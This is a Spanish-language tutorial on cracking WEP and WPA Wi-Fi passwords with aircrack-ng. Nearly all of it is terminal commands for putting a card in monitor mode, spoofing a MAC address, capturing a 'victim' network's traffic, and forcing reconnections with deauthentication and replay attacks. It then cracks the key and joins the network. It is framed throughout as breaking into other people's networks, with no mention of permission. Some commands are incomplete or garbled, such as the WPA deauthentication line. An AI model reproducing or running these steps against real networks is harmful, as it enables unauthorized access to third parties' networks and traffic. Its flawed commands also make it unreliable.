Para crackear WPA necesitas un Diccionario, y Aircrack probara palabra por palabra que se encuentre dentro del diccionario para intentar descifrar, entonces, si la contraseña no se encuentra dentro de esta, no la descifrara. Tambien necesitas un Cliente conectado, para usar una Falsa Autenticacion, si no consigues ningun cliente (STATION) conectado tampoco podrás crackear la clave.
Para modems que tienen filtrado de MAC, tambien necesitaras un STATION inclusive si estas intentando crackear WEP, una ves que tengas el STATION disponible, solo cambia el 11:22:33:44:55 por la direccion MAC del STATION en todos los pasos que veas 11:22:33:44:55
Click aquí para el diccionario¨
● Lo primero que hay que hacer es instalar la suite Aircrack
» sudo apt-get install aircrack-ng
● Después instalamos MacChanger
» sudo apt-get install macchanger
● Una vez instalado nos aseguramos de no estar conectados en ninguna red inalambrica, dando click derecho en el icono de la red y desactivando la red inalambrica, y abrimos una terminal:
- Activamos modo monitor en nuestra tarjeta de red (NO EN TODAS SE PUEDE, SI NO SE PUEDE ACTIVAR, NO PODRÁS CRACKEAR)
» sudo airmon-ng start wlan0
● Nos aparecerá que está activa en mon0, así que vamos a trabajar con mon0
● Damos de baja mon0
» sudo ifconfig mon0 down
● Cambiaremos la dirección MAC de mon0 por »00:11:22:33:44:55«
» sudo macchanger -m 00:11:22:33:44:55 mon0
● Damos de alta mon0
» sudo ifconfig mon0 up
● Escaneamos las redes, para encontrar a nuestra víctima
» sudo airodump-ng mon0
● Detenemos el escaneo presionando Ctrl -c
● Ejecutamos airodump-ng, cambiando los datos entre corchetes por los de la víctima
» sudo airodump-ng -c [# canal] -w [nombre red] –bssid [direccion MAC] mon0
● Abrimos otra terminal OJO: NO CIERRES LA ANTERIOR y aquí comienza la diversión, ejecutamos el ataque, cambiando los datos entre corchetes por los de la víctima
*PARA WEP*
» sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0
-PARA WPA-
» sudo aireplay-ng -0 1 -a [direccion MAC] -c
mon0
● Abrimos otra terminal TAMPOCO CIERRES LA ANTERIOR y ejecutamos lo siguiente, ya saben, cambiando los datos en corchetes por los de nuestra víctima
*PARA WEP*
» sudo aireplay-ng -2 -p 0841 -c FFFFFFF -b [direccion MAC] -h 00:11:22:33:44:55 mon0+ Presionamos que si (y) y damos enter.
-PARA WPA-
» sudo aircrack-ng -w [/directorio/del/diccionario.lst]
*.cap
● Abrimos cuarta y última terminal SIN CERRAR LAS ANTERIORES, cambiando los datos entre corchetes por los de la víctima
» sudo aircrack-ng -z [nombre red]*.cap
Y esperamos a que nos descifre la clave, una ves descifrada con exito te dara la clave en formato [XX:XX:XX:XX:XX], y activa tu red inalambrica dando click derecho al icono de la red, Seleccionamos la red crackeada e ingresamos la clave que nos dio de resultado aircrack en formato XXXXXXXXXX. Y terminaste, haz crackeado una red WIFI con encriptacion WEP o WPA.